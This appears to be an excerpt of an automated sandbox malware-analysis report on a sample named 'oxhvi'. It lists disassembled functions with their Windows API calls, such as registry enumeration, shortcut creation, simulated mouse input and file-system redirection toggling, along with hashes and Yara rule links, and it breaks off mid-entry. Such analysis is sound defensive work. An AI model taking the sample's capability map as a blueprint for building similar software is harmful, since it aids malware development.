                                                                                                                                                      • API String ID: 3203458085-0
                                                                                                                                                      • Opcode ID: 313b3151350ca3e98adc840912f583bfed36e923985d6c65a6fa65789dd050ab
                                                                                                                                                      • Instruction ID: 81116bccf0fba3a3561b0ce8ba95e13624b4aa47e9fdc437810db42895c717a6
                                                                                                                                                      • Opcode Fuzzy Hash: 313b3151350ca3e98adc840912f583bfed36e923985d6c65a6fa65789dd050ab
                                                                                                                                                      • Instruction Fuzzy Hash: A1B1C071604301AFD324DF24C899E6A7FA5BF88318F54894CF49A5B2A2DB31FD45CBA1
                                                                                                                                                      Function 00560547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __allrem.LIBCMT ref: 0056044A
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00560466
                                                                                                                                                      • __allrem.LIBCMT ref: 0056047D
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0056049B
                                                                                                                                                      • __allrem.LIBCMT ref: 005604B2
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005604D0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                      • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                                                                      • Instruction ID: f2c08de3c6c651161fd992867b3341d3fbdbadb0a044a67272358fb09b3d6915
                                                                                                                                                      • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                                                                      • Instruction Fuzzy Hash: AC81F6726007069BEB249E69CC85B6B7BE8FF90365F24992AF611D73C1EB70D940CB50
                                                                                                                                                      Function 0056658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00558669,00558669,?,?,?,005667DF,00000001,00000001,8BE85006), ref: 005665E8
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005667DF,00000001,00000001,8BE85006,?,?,?), ref: 0056666E
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00566768
                                                                                                                                                      • __freea.LIBCMT ref: 00566775
                                                                                                                                                        • Part of subcall function 00563BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00556A99,?,0000015D,?,?,?,?,005585D0,000000FF,00000000,?,?), ref: 00563BE2
                                                                                                                                                      • __freea.LIBCMT ref: 0056677E
                                                                                                                                                      • __freea.LIBCMT ref: 005667A3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                      • Opcode ID: 9a804cab1e63e3a6d4e5a72f5ae206b7ab4357bb2a4553470c12abdae5c69a10
                                                                                                                                                      • Instruction ID: 09cb3076651e4bebacc084e802804d34610c0d8ff97f3bd3d6b7d45efe477d4a
                                                                                                                                                      • Opcode Fuzzy Hash: 9a804cab1e63e3a6d4e5a72f5ae206b7ab4357bb2a4553470c12abdae5c69a10
                                                                                                                                                      • Instruction Fuzzy Hash: 1651D072600216AFEB258F64CC86EBB7FAAFB84754F194628FC05D7150EB34EC44D6A0
                                                                                                                                                      Function 005BC53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC629
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005BC684
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BC6C9
                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005BC6F8
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005BC752
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 005BC75E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1120388591-0
                                                                                                                                                      • Opcode ID: 880e8a68d15389dec31db2455d9d830276e211c77937d088c92da2e3ee0827e1
                                                                                                                                                      • Instruction ID: 7cee571cab85743f6327aee41eb7378b9c19e31bdebc551ccb819eadb1d909a5
                                                                                                                                                      • Opcode Fuzzy Hash: 880e8a68d15389dec31db2455d9d830276e211c77937d088c92da2e3ee0827e1
                                                                                                                                                      • Instruction Fuzzy Hash: 92816C71208241AFD714DF24C895E6ABFE5FF84308F1489ACF5568B2A2DB31ED45CB92
                                                                                                                                                      Function 0059003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00590049
                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 005900F0
                                                                                                                                                      • VariantCopy.OLEAUT32(005902F4,00000000), ref: 00590119
                                                                                                                                                      • VariantClear.OLEAUT32(005902F4), ref: 0059013D
                                                                                                                                                      • VariantCopy.OLEAUT32(005902F4,00000000), ref: 00590141
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059014B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                      • Opcode ID: a46ddd9552166e653b9c3d2d30883fe53a80e7b7035a2790762c6001b295d6e4
                                                                                                                                                      • Instruction ID: b8afc881bf50e0aa4d8dd983a45141843a4ea91d46e064bdc9f0361e4e86c7c2
                                                                                                                                                      • Opcode Fuzzy Hash: a46ddd9552166e653b9c3d2d30883fe53a80e7b7035a2790762c6001b295d6e4
                                                                                                                                                      • Instruction Fuzzy Hash: 6151F535600301AECF24AB64DC99B29BBA8FF95710F14AC47E906DF2D6DB709C44DB52
                                                                                                                                                      Function 005A6DE8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A6E36
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005A6F93
                                                                                                                                                      • CoCreateInstance.OLE32(005D0CC4,00000000,00000001,005D0B34,?), ref: 005A6FAA
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005A722E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                      • String ID: .lnk
                                                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                                                      • Opcode ID: a335823624be9973d2fc6a775f0ebc650495c49706f019ae9259fcb4f10b8f00
                                                                                                                                                      • Instruction ID: a8a2fe7a00c046e1224a7ec1c77ce7d5d1c3c4bfe33009bb0f0da850319ea1bc
                                                                                                                                                      • Opcode Fuzzy Hash: a335823624be9973d2fc6a775f0ebc650495c49706f019ae9259fcb4f10b8f00
                                                                                                                                                      • Instruction Fuzzy Hash: 5FD12571608202AFD304EF24C885A6BBBE8FF99704F44496DF5958B2A1DB71ED05CB92
                                                                                                                                                      Function 005B2C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 005B2C45
                                                                                                                                                        • Part of subcall function 005AEE49: GetWindowRect.USER32(?,?), ref: 005AEE61
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 005B2C6F
                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005B2C76
                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 005B2CB2
                                                                                                                                                      • GetCursorPos.USER32(?), ref: 005B2CDE
                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005B2D3C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                      • Opcode ID: 9fe83f975267e9f9d15eeb2b2165bc4a373c2c3e462905d1ff1fc701b04e7dff
                                                                                                                                                      • Instruction ID: ecec5388e72ce7f7f1e472c703594e27b4d9f7a9b174f989ea0f19a16281e5e5
                                                                                                                                                      • Opcode Fuzzy Hash: 9fe83f975267e9f9d15eeb2b2165bc4a373c2c3e462905d1ff1fc701b04e7dff
                                                                                                                                                      • Instruction Fuzzy Hash: 3D31B072505316AFD720DF14C849FAABBA9FBC8354F000929F599D7181D730E948CBA2
                                                                                                                                                      Function 005A6178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A61D5
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005A62EF
                                                                                                                                                      • CoCreateInstance.OLE32(005D0CC4,00000000,00000001,005D0B34,?), ref: 005A6308
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005A6326
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                      • String ID: .lnk
                                                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                                                      • Opcode ID: 9a1df1e1ff75bb70f433b7c165b0a36624675cea8961390f59d987743f827d31
                                                                                                                                                      • Instruction ID: 3c242aad5aa2d0cdb291458ef039a438e3758dd81edc9fc6ea368d6a926f6c71
                                                                                                                                                      • Opcode Fuzzy Hash: 9a1df1e1ff75bb70f433b7c165b0a36624675cea8961390f59d987743f827d31
                                                                                                                                                      • Instruction Fuzzy Hash: F7D121756042129FCB14DF24C494A2EBBE6FF8A714F188859F8869B361CB31EC45CB92
                                                                                                                                                      Function 00592104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0059210F
                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0059211B
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00592124
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0059212C
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00592135
                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0059213C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                      • Opcode ID: e58f41d78c47b0563de7dc3062cbff83b2a2d86adee87a2c96d13063b840d7d9
                                                                                                                                                      • Instruction ID: 54c74faa4e490ad95c6c431b81c68ff1cb87b775b980d5ec99d26758ab7112d9
                                                                                                                                                      • Opcode Fuzzy Hash: e58f41d78c47b0563de7dc3062cbff83b2a2d86adee87a2c96d13063b840d7d9
                                                                                                                                                      • Instruction Fuzzy Hash: A7E0C276004901BFDB011BA2ED0CD0ABF79FB69722B104634F225C2070CB329426EB60
                                                                                                                                                      Function 005C6BD7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005C6C41
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005C6C74
                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 005C6CE1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 3880355969-1270690246
                                                                                                                                                      • Opcode ID: f6ad260377c6f5bd7e6ba103a299b5fcb2b5221b334ee65ef74ce7b103739529
                                                                                                                                                      • Instruction ID: b136a8da2807758f6a2270f94c33edf86d7e0908503f422b93edae031788ab02
                                                                                                                                                      • Opcode Fuzzy Hash: f6ad260377c6f5bd7e6ba103a299b5fcb2b5221b334ee65ef74ce7b103739529
                                                                                                                                                      • Instruction Fuzzy Hash: BF510C74A00609AFCF15DF94C984EAE7BB6FF55360F10816DF9659B2A0D730AE81CB90
                                                                                                                                                      Function 0059CA3D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0059CAC6
                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0059CB0C
                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00602990,pb), ref: 0059CB55
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                      • String ID: 0$pb
                                                                                                                                                      • API String ID: 135850232-3053193360
                                                                                                                                                      • Opcode ID: 2bfd9235057efdacd062b51d53c487147814b38cc7ab26c3b6fd556b151f3f4d
                                                                                                                                                      • Instruction ID: e88e568092468552e18a82da9070d4750341afa18443def04e7bd41db06b49fa
                                                                                                                                                      • Opcode Fuzzy Hash: 2bfd9235057efdacd062b51d53c487147814b38cc7ab26c3b6fd556b151f3f4d
                                                                                                                                                      • Instruction Fuzzy Hash: 6B418E702053429FDB20DF28C846F1ABFE5BF95324F14466DF9A597291DB70A904CBA2
                                                                                                                                                      Function 00592672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005926F6
                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00592709
                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00592739
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                                                      • Opcode ID: 8f49f626e4dc711a441486f678c39eb62de58be96d077c3b78de60a4e6277ace
                                                                                                                                                      • Instruction ID: eb7f127867d412ecbd5afbdba9de28f01b26f97e0f12da1f17b80cfd6081a1be
                                                                                                                                                      • Opcode Fuzzy Hash: 8f49f626e4dc711a441486f678c39eb62de58be96d077c3b78de60a4e6277ace
                                                                                                                                                      • Instruction Fuzzy Hash: 2921E171900109BFDF14ABA4DC8ADFEBFB8FF91750F144519F511A72E1CB38490A9A20
                                                                                                                                                      Function 00536332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053633E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00536350
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536362
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                      • Opcode ID: 893aa68b09f978225c2aad065d695d609c8fa3dd52cdc0bccc91f9086d2f6acd
                                                                                                                                                      • Instruction ID: 40dc7a80251c36b6b10097850fb661f94924a3075d1251a91233bf88cb1261f7
                                                                                                                                                      • Opcode Fuzzy Hash: 893aa68b09f978225c2aad065d695d609c8fa3dd52cdc0bccc91f9086d2f6acd
                                                                                                                                                      • Instruction Fuzzy Hash: 14E08632601F212FD21127156C08F6BAB28BF91B13B094029F904D3140DB64CC05C4F0
                                                                                                                                                      Function 005362FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536304
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00536316
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536329
                                                                                                                                                      Strings
